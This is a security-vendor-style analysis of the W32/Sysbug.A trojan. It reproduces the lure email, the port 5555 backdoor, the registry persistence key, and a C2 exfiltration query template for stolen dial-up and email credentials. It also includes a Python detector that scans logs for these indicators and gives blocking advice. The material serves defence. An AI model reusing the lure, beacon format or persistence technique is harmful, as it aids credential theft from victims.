Virus

W32/Sysbug.A!tr

Analysis

  • The Trojan is a 32-bit executable with a compressed file size of 11,808 bytes
  • The Trojan may have been introduced to the system from an email attachment sent by a hacker or group of hackers in this format -

    From: james2003 @ hotmail.com
    Subject: Re[2]: Mary
    Hello my dear Mary,
    I have been thinking about you all night. I would like to apologize
    for the other night when we made beautiful love and did not use
    condoms. I know this was a mistake and I beg you to forgive me.
    I miss you more than anything, please call me Mary, I need you. Do
    you remember when we were having wild sex in my house? I remember it
    all like it was only yesterday. You said that the pictures would not
    come out good, but you were very wrong, they are great. I didn't want
    to show you the pictures at first, but now I think it's time for you
    to see them. Please look in the attachment and you will see what I
    mean.
    I love you with all my heart, James.
    Attachment: private.zip

  • If the Trojan is extracted from the .ZIP and run, it will bind to TCP port 5555 and await instructions from a hacker or group of hackers

  • The Trojan will copy itself into the %Windows% folder as "sysdeb32.exe" and then launch itself

  • The Trojan will modify the registry to auto run at next Windows startup as in this example -

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
    "SystemDebug" = C:\WINNT\sysdeb32.exe

  • The Trojan will then perform two DNS queries

  • The first DNS query is for the server named 'www.kernel.org'

  • The second DNS query is for a server named 'finance.red-host.com'

  • The Trojan communicates with the second server at the IP address returned in the DNS response, 82.146.56.242, over TCP port 80

  • The Trojan attempts to gather RAS dial-up information from the infected system and then send this data to the web server using a server side script

  • The script file is named "events.php" and the Trojan sends data in the form of a query as in this example -

    GET /events.php?id=%s&ip=%s&speed=%d&timeonline=%d

    where %s and %d are machine specific values

  • The Trojan attempts to connect with the web server repeatedly

  • The Trojan contains code to write other connection information to a file named "c:\temp35.txt" - this file could contain the following types of information -

    Internet Account Name
    POP3 Password
    POP3 User Name
    NNTP Server
    NNTP User Name
    SMTP Display Name
    SMTP Email Address
    SMTP Organization Name

  • It is plausible that infected systems could have this information sent to a hacker across TCP port 5555
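As an added detection example (not part of the original analysis), the following Python scans web-proxy and DNS log lines for the indicators listed above: the events.php query with the id/ip/speed/timeonline parameters sent to finance.red-host.com or 82.146.56.242, and DNS resolution of the C2 name. The log line formats and all sample lines are constructed assumptions, not captured traffic.

```python
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the W32/Sysbug.A analysis above.
C2_HOSTS = {"finance.red-host.com", "82.146.56.242"}
BEACON_PATH = "/events.php"
BEACON_PARAMS = {"id", "ip", "speed", "timeonline"}

def is_sysbug_beacon(url):
    """True when a URL has the shape of the RAS-data exfiltration query."""
    parts = urlsplit(url)
    if parts.hostname not in C2_HOSTS or parts.path != BEACON_PATH:
        return False
    # All four query keys must be present; their values are machine specific.
    return BEACON_PARAMS <= set(parse_qs(parts.query, keep_blank_values=True))

def scan_proxy_log(lines):
    """Return (client_ip, url) pairs for beacon requests.
    Assumed constructed log format: '<timestamp> <client_ip> <method> <url>'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) >= 4 and fields[2] == "GET" and is_sysbug_beacon(fields[3]):
            hits.append((fields[1], fields[3]))
    return hits

def scan_dns_log(lines):
    """Return sorted client IPs that resolved the C2 name (www.kernel.org is ignored).
    Assumed constructed log format: '<timestamp> <client_ip> query <name>'."""
    return sorted({f[1] for f in map(str.split, lines)
                   if len(f) >= 4 and f[3].rstrip(".").lower() == "finance.red-host.com"})

# Constructed sample data (not captured from a real infection).
SAMPLE_PROXY = [
    "2003-11-24T10:01:02 10.0.0.12 GET http://www.example.com/index.html",
    "2003-11-24T10:01:09 10.0.0.12 GET http://finance.red-host.com/events.php?id=host1&ip=10.0.0.12&speed=56000&timeonline=120",
    "2003-11-24T10:02:15 10.0.0.33 GET http://82.146.56.242/events.php?id=host2&ip=10.0.0.33&speed=33600&timeonline=3",
    "2003-11-24T10:03:00 10.0.0.40 GET http://finance.red-host.com/index.html",
]
SAMPLE_DNS = [
    "2003-11-24T10:01:05 10.0.0.12 query www.kernel.org",
    "2003-11-24T10:01:07 10.0.0.12 query finance.red-host.com",
    "2003-11-24T10:02:10 10.0.0.33 query finance.red-host.com.",
]

if __name__ == "__main__":
    print(scan_proxy_log(SAMPLE_PROXY))
    print(scan_dns_log(SAMPLE_DNS))
```

Any client that appears in both scans has resolved the C2 name and then sent the beacon, which is the strongest sign of an active infection.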

Recommended Action

  • Add port 5555 as a service and block access to this port for both inbound and outbound traffic (INT -> EXT and EXT -> INT)
  • Block access to the web address finance.red-host.com